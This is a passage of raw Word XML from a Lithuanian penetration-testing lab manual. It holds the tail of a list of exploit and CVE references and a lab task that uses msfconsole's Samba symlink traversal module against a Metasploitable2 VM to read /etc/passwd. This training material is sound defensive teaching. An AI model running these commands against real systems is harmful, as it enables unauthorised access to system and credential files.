      <w:r w:rsidR="4CBED805" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Scarybeastsecurity</w:t>
      </w:r>
      <w:r w:rsidR="4CBED805" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="33810B62" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId118">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6711BACC" w14:textId="100B6473" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="6CBB6CEC" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Unreal</w:t>
      </w:r>
      <w:r w:rsidR="7A755B1C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IRCD 3.2.8.1 Backdoor Command Execution.</w:t>
      </w:r>
      <w:r w:rsidR="387D01DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2018, </w:t>
      </w:r>
      <w:r w:rsidR="10A87986" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">gegužės 30). </w:t>
      </w:r>
      <w:r w:rsidR="0B3878AD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Rapid7 Vulnerability &amp; Exploit Database</w:t>
      </w:r>
      <w:r w:rsidR="0B3878AD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="33810B62" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId119">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F470B2B" w14:textId="0D631AD2" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="3EB823E2" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DistCC Daemon Command Execution. (2018, gegužės 30). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid7 Vulnerability &amp; Exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Database</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="33810B62" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId120">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B5BB66B" w14:textId="2B05D89A" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="7EEEA10E" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2004-2687. </w:t>
      </w:r>
      <w:r w:rsidR="56FED1CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Common Vulnerabilities and Exposures.</w:t>
      </w:r>
      <w:r w:rsidR="56FED1CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="33810B62" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId121">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="615E2B28" w14:textId="2AB01D3B" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="7EEEA10E" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-2009-1185.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Common Vulnerabilities and Exposures. </w:t>
      </w:r>
      <w:r w:rsidR="33810B62" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId122">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE%202009-1185</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="489E7E1B" w14:textId="199F065C" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="471025E7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidR="1BF20196" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-2009-1185.c</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="29D433D1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Expoit </w:t>
      </w:r>
      <w:r w:rsidR="6A27E43D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Database. </w:t>
      </w:r>
      <w:r w:rsidR="33810B62" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId123">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.exploit-db.com/download/8572</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64452CE2" w14:textId="77777777" w:rsidR="00F657F3" w:rsidRPr="005A5C28" w:rsidRDefault="00F657F3" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4004C1AF" w14:textId="641EE507"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1</w:t>
      </w:r>
      <w:r w:rsidR="42890CD5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. PAŽEIDŽIAMUMŲ IŠNAUDOJIMAS NR.</w:t>
      </w:r>
      <w:r w:rsidR="00160B2B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ĮRANKIO „MSFCONSOLE“ </w:t>
      </w:r>
      <w:r w:rsidR="005E7A35" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PA</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NAUDOJIMAS PRIVILEGIJUOTO VARTOTOJO TEISIŲ ĮGIJIMUI PER SMB PROTOKOLĄ</w:t>
      </w:r>
      <w:r w:rsidR="005E7A35" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D57D7E0" w14:textId="1981572C" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Testuojama Sistema: Metasploitable2</w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>veikianti virtualiame kompiuteryje</w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F989962" w14:textId="6FBC232A" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sistema testavimui: Virtualus arba fizinis kompiuteris su testavimui skirta operacine sistema. Įdiegtas ir paruoštas darbui įrankis „MSFCONSOLE“</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5CB44C" w14:textId="259FC0E5" w:rsidR="005E7A35" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Užduotis. Panaud</w:t>
      </w:r>
      <w:r w:rsidR="005E7A35" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>odami</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>„msfconsole“</w:t>
      </w:r>
      <w:r w:rsidR="00BA54A7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> įrankį</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> suras</w:t>
      </w:r>
      <w:r w:rsidR="005E7A35" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> pažeidžiamumus išnaudojančias programas (angl. exploit) protokolams: SMB (toliau [name]) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCC5835" w14:textId="21AEE38F" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Darbo eiga:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35631D4E" w14:textId="34D03766"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smbclient -L //[IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D6E981" w14:textId="23E151A6"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 msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E79A94" w14:textId="3D885D3C"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gt;search [name]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F0EACD" w14:textId="30D2BE1C"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gt;use &lt;..&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6376BD" w14:textId="281BB8F2"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gt;set RHOST [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAEAE57" w14:textId="2D3F92AD"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gt;set SMBSHARE tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B811E1" w14:textId="2EBAD350"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gt;exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280B8FE8" w14:textId="1BB7D2BC"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gt;exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A079B4" w14:textId="12DDB519"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 smbclient -L //[IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C59193B" w14:textId="4A2DCD3E"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 smbclient //[IP]/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB9F013" w14:textId="35F2E39F"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smb: \&gt; cd rootfs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7697E7" w14:textId="29F7FBFC"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smb: \rootfs\&gt; cd etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B78E66E" w14:textId="77777777" w:rsidR="00924E65"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smb: \rootfs\etc\&gt; cat passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156D4443" w14:textId="4FBDB295" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00AB1DA7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EB34381" w14:textId="191AC3CD" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-Nukopijuokite ir išsaugokite failo „/etc/passwd“ turinį</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6244ABA5" w14:textId="28769451" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Išimtas tekstas &lt;..&gt;:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C460B7D" w14:textId="77777777" w:rsidR="00924E65"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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>auxiliary/admin/smb/samba_symlink_traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0813D634" w14:textId="282CDDCF" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00AB1DA7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A363061" w14:textId="3FEC54B4" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Komentaras: [IP] – testuojamos sistemos IP adresas pasiekiamas tinkle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC734D5" w14:textId="4CFE57D6" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00AB1DA7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="723C0F71" w14:textId="3C90CA63" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6F6667" w14:textId="21CBD45F" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="52420375" w:rsidP="0089230F">
      <w:pPr>
